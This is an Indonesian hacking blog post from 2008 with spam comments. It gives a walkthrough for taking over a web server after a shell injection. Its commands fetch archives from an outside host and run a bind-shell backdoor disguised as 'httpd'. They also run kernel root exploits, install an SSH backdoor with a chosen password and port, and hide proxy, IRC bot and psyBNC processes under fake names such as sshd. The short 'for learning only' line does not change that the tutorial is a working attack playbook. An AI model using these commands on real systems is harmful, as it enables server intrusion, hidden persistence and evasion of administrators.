Minggu, 28 September 2008

Tutorial Hacking Shell Inject

ini hanya salahsatu tutorial hacking :

Sekilas cara ngeroot server injeckan

Pertama dapatkan sebuah target lalu kita load bind telnet

1. wget http://geocities.com/bstraq/alat/bind.tar.gz atau bind.zip
tar -zxvf bind.tar.gz;rm -rf bind.tar.gz
mv bind httpd
./httpd
lalu login dengan port 2008 telnet pass:balihackerlink

2. cd /tmp atau directory full write
wget http://geocities.com/bstraq/alat/root.tar.gz
tar -zxvf root.tar.gz;rm -rf root.tar.gz
cd .binsh
./sesuaikan dengan kernelnya

contoh.

- kernel 2.4.20
./brk2
bravo anda pasti dapat rootnya

3. Jangan lupa install backdoor ssh setelah mendapat rootnya
wget http://geocities.com/bstraq/alat/ssh.tar.gz
tar -zxvf ssh.tar.gz;rm -rf ssh.tar.gz
cd sshdoor
./install passwordmu portmu

contoh.

- ./install aleycrew 1234
- ./install aleycrew 1212


selamat mencoba ...

------------------------------------------------------------------------------
Command untuk patched web site:
------------------------------

example: Patched By aleycrew
------------------------------------------------------------------------

example:
Warning: include(/inc.php) [function.include]: failed to open stream: No such file or directory in /home/rdstudio/domains/teafree.pl/public_html/joomla/language/inc.php on line 1
------------------------------------------------------------------------
Command mencari directory yang full permition:
---------------------------------------------

find / -perm 777 -type d

Command bikin folder menjadi tgz:
---------------------------------
tar czvf namafile.tgz folder
tar -zxvf namafile.tgz <-- extrax tgz



Proxy own make!
-----------------
Biasanya kita mencari proxy dari site site seperti samair.ru dll.
disini Rocks punya trik untuk dapet proxy bermodalkan inject/shell

login ke shell elu.
# curl -o proxy.tgz http://www.geocities.com/bstraq/alat/proxy.tgz
# tar -zxf proxy.tgz
# cd pro
# ./xh -s "sendmail: accepting connection" -d -p prox.pid ./prox -a -d -p5050
selesai� proxy berjalan di port 5050.

==================================================
Cara cepat bikin EggDrop!

[x@bhlserver ~]$ curl -o dalnet.tar.gz http://www.geocities.com/bstraq/alat/dalnet.tar.gz
[x@bhlserver ~]$ tar -zxf dalnet.tar.gz
[x@bhlserver ~]$ cd .sys
[x@bhlserver .sys]$ ./bot a.txt BHL bhl XXX.XX.XXX.XXX aley aley


Cara Penggunaan :

./bot pr1 pr2 pr3 pr4 pr5 pr6 pr7

pr1 = nama file conf yg akan dibuat
pr2 = nick
pr3 = ident
pr4 = IP
pr5 = nama channel (jangan pake #)
pr6 = nick owner
pr7 = port telnet
[x@bhlserver .sys]$ ./bot a.txt aley aley irc.dal.net aley aley

Config file : a.txt
set nick “aley�
set username “aley�
set my-ip �216.XX.208.XXX�
set basechan �#balihackerlink�
set owner “aley�


ketik: ./eggdrop -m log untuk menjalankan bot anda

Thanks to all my Friends @irc.dal.net

[x@bhlserver .sys]$ ./xh -s �/usr/sbin/sshd� ./eggdrop -m log

STARTING BOT IN USERFILE CREATION MODE.
Telnet to the bot and enter ‘NEW� as your nickname.
OR Go to IRC and: /msg BHL hello
This will make the bot recognize you as the master.

[22:40] === log-: 0 channels, 0 users.
Launched into the background (pid: 8098)

tcl bisa ditambahkan pada directory scripts.
kalian bisa edit sendiri pake pico/vi/nano ato editor yg lain
selamat mencoba.
jika kalian pake shell inject, untuk melihat ip address listnya bisa ketik

/sbin/ifconfig | grep inet

cmd ./xh -s “blablabla� cuma untuk hide proses aja, ato bisa pake shade. ato bisa langsung pake perintah ./dssl namaconfig
jika kalian pake shell ga perlu cmd itu, langsung aja ./eggdrop -m namaconfig
selamat mencoba.

thankz for my teacher

================================================
CARA BIKIN PSYBNC

login shell kalo udah punya
wget http://www.geocities.com/bstraq/alat/psy.tgz
tar -zxvf psy.tar.gz
cd .psy
./config ident port
example: ./config aley 39391
./fuck
./run
selesai dah...
=====================================================
ilmu tanpa di bagi dan di gunakan akan semakin langka..akan tetapi janganlah sekali kali untuk merusaknya
karena tutor ini hanya bersifat pembelajaran saja....

source :bhl

3 komentar:

Anonim mengatakan...

Interesting blog! Is your theme custom made or did you download it from somewhere?
A theme like yours with a few simple tweeks would really make my blog jump out.
Please let me know where you got your design.
Thanks

Review my site: wall mount brackets

scr888 deals mengatakan...

I wanted to thank you for this great 918kiss malaysia read. Your blog is one of the finest blog . Thanks for posting this informative article.

SCR888 Online mengatakan...

You got a really useful blog I have been here jackpot slot scr888 reading for about half an hour. I am a newbie and your post is valuable for me.